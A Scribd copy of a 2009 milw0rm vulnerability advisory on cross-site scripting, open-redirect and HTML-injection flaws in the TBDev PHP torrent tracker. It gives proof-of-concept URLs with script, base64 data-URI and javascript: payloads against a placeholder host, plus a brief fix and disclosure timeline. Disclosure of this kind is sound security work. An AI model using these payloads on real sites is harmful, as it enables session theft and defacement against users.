Scribd Logo
Upload

Welcome to Scribd!

  • 8942

    Uploaded by

    Zeu Aress
    14 views2 pages
    aaaaa

    Copyright

    © © All Rights Reserved

    Available Formats

    TXT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    aaaaa

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as txt, pdf, or txt
    14 views2 pages

    8942

    Uploaded by

    Zeu Aress
    aaaaa

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as txt, pdf, or txt
    of 2

    TBDev - Cross Site Scripting and HTML Injection Vulnerabilities

    Version Affected: 01-01-2008 (16th January 2008) (newest)

    Info: TBDEV.NET is a project to further enhance, update and develop a


    software (php peer-to-peer) from the original torrentbits/bytemonsoon
    source code.

    Credits: InterN0T

    External Links:
    http://www.tbdev.net

    -:: The Advisory ::-

    Vulnerable Function / ID Calls:


    returnto

    Cross Site Scripting: (Sysops / Mods Only!)


    http://[HOST]/tbdev/tbdev-01-01-08/makepoll.php?returnto=><script>alert(0)</script>
    http://[HOST]/tbdev/tbdev-01-01-08/polls.php?
    action=delete&pollid=1&returnto=><script>alert(0)</script><br

    Cross Site Script Redirection: (Sysops / Mods Only!)


    http://[HOST]/tbdev/tbdev-01-01-08/news.php?
    action=delete&newsid=1&returnto=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L
    3NjcmlwdD4K&sure=1

    Cross Site Script Redirection: (Anyone, the enduser will need to log in
    though)
    http://[HOST]/tbdev/tbdev-01-01-08/login.php?returnto=http://[HOST]
    http://[HOST]/tbdev/tbdev-01-01-08/login.php?
    returnto=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K

    HTML Injection:
    1) http://[HOST]/tbdev/tbdev-01-01-08/my.php
    -- Info field: &lt;/textarea&gt;<script>alert(0)</script> << is reflected
    locally only!

    2) http://[HOST]/tbdev/tbdev-01-01-08/my.php
    -- Avatar field: javascript:alert(0)

    2b) Affected Sites by HTML Injection:


    http://[HOST]/tbdev/tbdev-01-01-08/userdetails.php?id=USERID

    Internet Explorer 6 and perhaps 7 should be triggered by this.


    Please see: http://ha.ckers.org/xss.html for more information.
    Browser Tested: Internet Explorer 7 (FireFox 3 was tested for the other
    vulnerabilities)

    -:: Solution ::-


    Secure redirection calls with referer headers (just an example) and
    filter bad characters.

    Conclusion:
    This system was fun to find bad code in, it sure had a nice diversity of
    vulnerabilities.
    Reference:
    http://forum.intern0t.net/intern0t-advisories/1121-intern0t-tbdev-01-01-2008-
    multiple-vulnerabilities.html

    Disclosure Information:
    - Vulnerabilities found, researched and confirmed between 5th to 10th June.
    - Advisory finished and published on InterN0T the 12th June.
    - Vendor and Buqtraq (SecurityFocus) contacted the 12th June.

    All of the best,


    MaXe

    # milw0rm.com [2009-06-12]

    You might also like